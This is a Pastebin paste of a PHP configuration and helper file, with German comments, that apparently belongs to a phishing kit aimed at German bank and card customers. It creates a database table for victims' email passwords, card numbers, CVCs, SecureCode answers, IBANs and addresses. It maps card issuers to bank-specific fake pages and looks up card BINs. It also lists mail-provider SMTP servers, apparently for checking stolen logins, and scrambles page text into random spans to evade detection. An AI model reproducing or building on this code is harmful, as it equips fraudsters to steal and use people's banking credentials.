Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- session_start();
- // Configuration
- $config = [
- 'url' => 'http://' . $_SERVER['HTTP_HOST'] . '',
- 'mysql' => [
- 'hostname' => 'localhost',
- 'username' => 'root',
- 'password' => '123456',
- 'database' => 'pp'
- ],
- 'bincodes' => [
- 'enabled' => true,
- 'api_key' => '2d974e94811161f1dda14bbf63aa9790'
- ],
- // Alle SMTPs welche nicht folgenden Format haben: smtp.example.com:25
- 'smtps' => [
- 'web.de' => [
- 'host' => 'smtp.web.de',
- 'port' => 587
- ],
- 'aol.com' => [
- 'host' => 'smtp.de.aol.com',
- 'port' => 587
- ],
- 'aol.de' => [
- 'host' => 'smtp.aim.com',
- 'port' => 587
- ],
- 'aim.com' => [
- 'host' => 'smtp.aim.com',
- 'port' => 587
- ],
- 'arcor.de' => [
- 'host' => 'mail.arcor.de',
- 'port' => 25
- ],
- 'bluewin.ch' => [
- 'host' => 'smtpauths.bluewin.ch',
- 'port' => 25
- ],
- 'gmail.com' => [
- 'host' => 'smtp.gmail.com',
- 'port' => 587
- ],
- 'gmail.de' => [
- 'host' => 'smtp.gmail.com',
- 'port' => 587
- ],
- 'googlemail.com' => [
- 'host' => 'smtp.gmail.com',
- 'port' => 587
- ],
- 'gmx.de' => [
- 'host' => 'mail.gmx.net',
- 'port' => 587
- ],
- 'gmx.net' => [
- 'host' => 'mail.gmx.net',
- 'port' => 587
- ],
- 'outlook.de' => [
- 'host' => 'smtp-mail.outlook.com',
- 'port' => 587
- ],
- 'live.de' => [
- 'host' => 'smtp-mail.outlook.com',
- 'port' => 587
- ],
- 'hotmail.de' => [
- 'host' => 'smtp-mail.outlook.com',
- 'port' => 587
- ],
- 'live.com' => [
- 'host' => 'smtp-mail.outlook.com',
- 'port' => 587
- ],
- 'outlook.com' => [
- 'host' => 'smtp-mail.outlook.com',
- 'port' => 587
- ],
- 'yahoo.de' => [
- 'host' => 'smtp.mail.yahoo.com',
- 'port' => 25
- ],
- 'yahoo.com' => [
- 'host' => 'smtp.mail.yahoo.com',
- 'port' => 25
- ],
- 't-online.de' => [
- 'host' => 'securesmtp.t-online.de',
- 'port' => 25
- ],
- 'unitybox.de' => [
- 'host' => 'submit.unitybox.de',
- 'port' => 587
- ],
- 'kabelbw.de' => [
- 'host' => 'submit.kabelbw.de',
- 'port' => 587
- ],
- 'one.com' => [
- 'host' => 'send.one.com',
- 'port' => 587
- ],
- 'freenet.de' => [
- 'host' => 'mx.freenet.de',
- 'port' => 587
- ]
- ],
- // Bins bei dem die SecureCode Abfrage übersprungen werden
- 'skipBins' => [
- /*
- '457096',
- '548622',
- '548621'
- */
- ],
- // Banken (Alles groß schreiben, da es bei Debian sonst nicht erkannt wird)
- 'banks' => [
- 'santander' => [
- //'SANTANDER CONSUMER BANK AG',
- //'SANTANDER DIREKT BANK AG',
- //'SANTANDER'
- ],
- 'vw' => [
- //'VOLKSWAGEN BANK GMBH',
- //'VOLKSWAGEN'
- ],
- 'advanzia' => [
- //'ADVANZIA BANK, S.A.',
- //'ADVANZIA'
- ],
- 'barclay' => [
- //'BARCLAYS BANK PLC',
- //'BARCLAYCARD GERMANY',
- //'BARCLAY'
- ],
- 'airp' => [
- //'LUFTHANSA AIRPLUS SERVICEKARTEN GMBH'
- ],
- 'dkb' => [
- //'DEUTSCHE KREDITBANK AG (DKB), LUFTHANSA, MILES AND MORE',
- //'DEUTSCHE KREDITBANK'
- ],
- 'lbb' => [
- //'LANDESBANK BERLIN AG'
- ],
- 'dzb' => [
- //'DZ BANK AG',
- //'DZ BANK AG DEUTSCHE ZENTRAL- GENOSSENSCHAFTSBANK'
- ],
- 'wgz' => [
- //'WGZ BANK AG WESTDEUTSCHE GENOSSENSCHAFTS-ZENTRALBANK',
- //'WGZ'
- ],
- 'volksbank' => [
- //'VOLKSBANK'
- ],
- 'spardabank' => [
- //'SPARDABANK',
- //'SPARDA'
- ],
- 'postbank' => [
- //'DEUTSCHE POSTBANK AG',
- //'POSTBANK BERLIN',
- //'POSTBANK'
- ],
- 'sparkasse' => [
- //'DEUTSCHER SPARKASSEN - UND GIROVERBAND',
- //'SPARKASSE',
- //'SPARKASSEN',
- //'SPARKASSE SCHAUMBURG',
- //'SPARKASSE MAINZ',
- //'STADTSPARKASSE'
- ],
- 'random' => [
- //'TARGOBANK AG AND CO. KGAA',
- //'CITIBANK AG',
- //'ING-DIBA AG',
- //'COMMERZBANK AG',
- //'MERCEDES-BENZ BANK AG',
- //'LANDESBANK BADEN-WUERTTEMBERG',
- //'COMDIRECT BANK AG',
- //'DEUTSCHE BANK AG',
- //'DEUTSCHE BANK PRIVAT-UND GESCHAEFTSKUNDEN AG',
- //'BAYERISCHE LANDESBANK GIROZENTRALE',
- //'BAYERISCHE LANDESBANK',
- //'SUEDDEUTSCHE BANK GMBH'
- ]
- ]
- ];
- if(!defined('CONTINUE_PDO')) {
- // MySQL Connection
- $pdo = new PDO(
- 'mysql:host=' . $config['mysql']['hostname'] . ';',
- $config['mysql']['username'],
- $config['mysql']['password']
- );
- $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
- $pdo->query('CREATE DATABASE IF NOT EXISTS ' . $config['mysql']['database']);
- $pdo->query('use ' . $config['mysql']['database']);
- $pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
- $pdo->setAttribute(PDO::MYSQL_ATTR_INIT_COMMAND, "SET NAMES 'utf8' COLLATE 'utf8_general_ci'");
- $pdo->exec('SET NAMES \'utf8\'');
- mb_internal_encoding('UTF-8');
- $pdo->exec('
- CREATE TABLE IF NOT EXISTS `admins` (
- `id` int(11) NOT NULL AUTO_INCREMENT,
- `username` varchar(255) NOT NULL,
- `password` varchar(255) NOT NULL,
- PRIMARY KEY (`id`)
- ) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=latin1;
- INSERT IGNORE INTO `admins` VALUES (\'1\', \'Admin\', \'123456\');
- CREATE TABLE IF NOT EXISTS `logs` (
- `id` int(11) NOT NULL AUTO_INCREMENT,
- `ip` varchar(255) DEFAULT NULL,
- `user_agent` text,
- `email` varchar(255) DEFAULT NULL,
- `password` varchar(255) DEFAULT NULL,
- `method` enum(\'creditcard\',\'bank\',\'none\') DEFAULT \'none\',
- `firstname` varchar(255) DEFAULT NULL,
- `surname` varchar(255) DEFAULT NULL,
- `dob_day` int(11) DEFAULT \'0\',
- `dob_month` int(11) DEFAULT \'0\',
- `dob_year` int(11) DEFAULT \'0\',
- `cc_number` varchar(255) DEFAULT NULL,
- `cc_expire_month` int(2) DEFAULT NULL,
- `cc_expire_year` int(4) DEFAULT NULL,
- `cc_cvc` int(4) DEFAULT NULL,
- `cc_bank` varchar(255) DEFAULT NULL,
- `cc_type` varchar(255) DEFAULT NULL,
- `cc_level` varchar(255) DEFAULT NULL,
- `cc_country` varchar(255) DEFAULT NULL,
- `cc_countrycode` varchar(255) DEFAULT NULL,
- `cc_card` varchar(255) DEFAULT NULL,
- `cc_limit` int(11) DEFAULT \'0\',
- `bank_iban` varchar(255) DEFAULT NULL,
- `bank_bic` varchar(255) DEFAULT NULL,
- `bank_name` varchar(255) DEFAULT NULL,
- `sc_1` varchar(255) DEFAULT NULL,
- `sc_2` varchar(255) DEFAULT NULL,
- `street` varchar(255) DEFAULT NULL,
- `city` varchar(255) DEFAULT NULL,
- `plz` int(5) DEFAULT NULL,
- `timestamp` varchar(255) DEFAULT \'123456789\',
- `mobilenr` varchar(255) DEFAULT NULL,
- PRIMARY KEY (`id`)
- ) ENGINE=InnoDB AUTO_INCREMENT=1 DEFAULT CHARSET=latin1;
- ');
- }
- // Classes
- class RandomHash {
- public static function init() {
- if(!isset($_SESSION['randomLetter'])) {
- $_SESSION['randomLetter'] = substr(str_shuffle(str_repeat($chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ', ceil(1 / strlen($chars)) )), 1, 1);
- }
- }
- public static function generate($string = '') {
- return $_SESSION['randomLetter'] . sha1($string . sha1(session_id()));
- }
- public static function generateUselessKey() {
- return md5($_SESSION['randomLetter']);
- }
- public static function stringSplitUnicode($string, $l = 0) {
- if ($l > 0) {
- $result = [];
- $length = mb_strlen($string, 'UTF-8');
- for ($i = 0; $i < $length; $i += $l) {
- $result[] = mb_substr($string, $i, $l, 'UTF-8');
- }
- return $result;
- }
- return preg_split("//u", $string, -1, PREG_SPLIT_NO_EMPTY);
- }
- public static function generateUseless($string = '') {
- $result = '';
- foreach(self::stringSplitUnicode($string) as $letter) {
- $result .= '<span class="' . self::generate('rnd-span') . ' ' . self::generate(self::generateUselessKey()) . '">' . $letter . '</span>';
- }
- return $result;
- }
- }
- RandomHash::init();
- // Functions
- function generateToken() {
- if(version_compare(phpversion(), '7', '>=')) {
- $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
- } else if(function_exists('mcrypt_create_iv')) {
- $_SESSION['csrf_token'] = bin2hex(mcrypt_create_iv(32, MCRYPT_DEV_URANDOM));
- } else {
- $_SESSION['csrf_token'] = bin2hex(openssl_random_pseudo_bytes(32));
- }
- return $_SESSION['csrf_token'];
- }
- function getToken() {
- if(!isset($_SESSION['csrf_token']) || empty($_SESSION['csrf_token'])) {
- generateToken();
- }
- return $_SESSION['csrf_token'];
- }
- function getOB($bankName) {
- global $config;
- $bankName = strtoupper($bankName);
- foreach($config['banks'] as $obKey => $obNames) {
- foreach($obNames as $obName) {
- if(strtoupper($obName) == $bankName || strpos(strtoupper($obName), $bankName) !== false || (count(explode(' ', $bankName)) > 0 && strpos(strtoupper($obName), explode(' ', $bankName)[0]) !== false)) {
- return strtolower($obKey);
- }
- }
- }
- return null;
- }
- function isLoggedIn() {
- global $pdo;
- if(isset($_SESSION['acp_username'], $_SESSION['acp_password'])) {
- $stmt = $pdo->prepare('SELECT NULL FROM `admins` WHERE `username` = ? AND `password` = ? LIMIT 1');
- $stmt->execute([$_SESSION['acp_username'], $_SESSION['acp_password']]);
- return $stmt->rowCount() > 0;
- }
- return false;
- }
- function getLogsCount() {
- global $pdo;
- $qry = $pdo->query('SELECT NULL FROM `logs`');
- return $qry->rowCount();
- }
- function getUserInfo($row, $filter = true) {
- global $pdo;
- if(isLoggedIn()) {
- $stmt = $pdo->prepare('SELECT `' . $row . '` FROM `admins` WHERE `username` = ? AND `password` = ? LIMIT 1');
- $stmt->execute([$_SESSION['acp_username'], $_SESSION['acp_password']]);
- if($stmt->rowCount() > 0) {
- $obj = $stmt->fetch(PDO::FETCH_OBJ);
- return $filter ? htmlspecialchars($obj->{$row}) : $obj->{$row};
- }
- }
- return '';
- }
- function getIp() {
- $ip = $_SERVER['REMOTE_ADDR'];
- if(!empty($_SERVER['HTTP_CLIENT_IP'])) {
- $ip = $_SERVER['HTTP_CLIENT_IP'];
- } else if(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
- $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
- } else if(isset($_SERVER['HTTP_CF_CONNECTING_IP'])) {
- $ip = $_SERVER['HTTP_CF_CONNECTING_IP'];
- }
- return $ip;
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement